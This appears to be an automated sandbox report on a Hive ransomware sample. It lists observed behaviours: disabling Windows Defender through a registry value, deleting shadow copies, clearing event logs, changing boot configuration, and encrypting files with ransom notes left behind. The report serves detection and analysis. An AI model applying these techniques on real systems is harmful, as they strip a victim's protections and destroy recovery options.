Analysis Overview
SHA256
1cba1a291ce919947f88133cd5e57177a1a1585fcb91bc39f61fabccf52ca76a
Threat Level: Known bad
The file c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.7z was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Deletes Windows Defender Definitions
Hive
Modifies Windows Defender Real-time Protection settings
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Modifies extensions of user files
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Opens file in notepad (likely ransom note)
Interacts with shadow copies
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 19:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win7-en-20211208
Max time kernel
182s
Max time network
124s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-desk.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_-QdHfhJgdIo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYER98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_IP1QxnAExbA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215076.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_nYvWBHUVz2k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_AktY0Fb8tj40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpcore_4.2.5.v201311072007.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_x8wScbWpV0A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_Undocked.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.INF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_q7mDP58Ue640.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099201.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_ppJWokR7gNc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_9znLbMUVkOw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_L0jB_2BzHVE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105368.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_CsxtEScqIOc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_OLHdCQs6qlM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_5oAyYdFdhGs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_zcaawo9I91I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_t8ybF_woHpI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\TOC98.POC.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dpTWGEB2zlo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_HguxSk5_qJQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_eAoPrwCmf6M0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1NUNv85SfKE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_H9Sw2I-NhPQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\ja-JP\sbdrop.dll.mui | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_aHyk0Cx-EoY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00555_.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_Rz7rbldeanM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Solstice.thmx.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_7VYzzCb49Bc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_r1JsYqjHkfQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_fyyKrIIjZhw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7FR.LEX.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1S0DkVNFyJE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_dG0Y2VLVPZU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_gNJm2LdGyeE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1tc5K1JFgj00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_MfOITshG0C40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_4qfVfFrBGDc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_up.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_EKm8KedZVac0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_xvsftD7L4eE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_59CfPhvU4gc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01743_.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_LFS10E66NZI0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_RQmmA2AZqb40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_1LEJ-ivifeA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_S6nEgIoxBnA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_i6rkMkgC6hE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5.QAVmxw3plmdpzBpXVxNZu0y4FT4KWqrhUHpJ-lB9RW7_POsspnLpQio0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
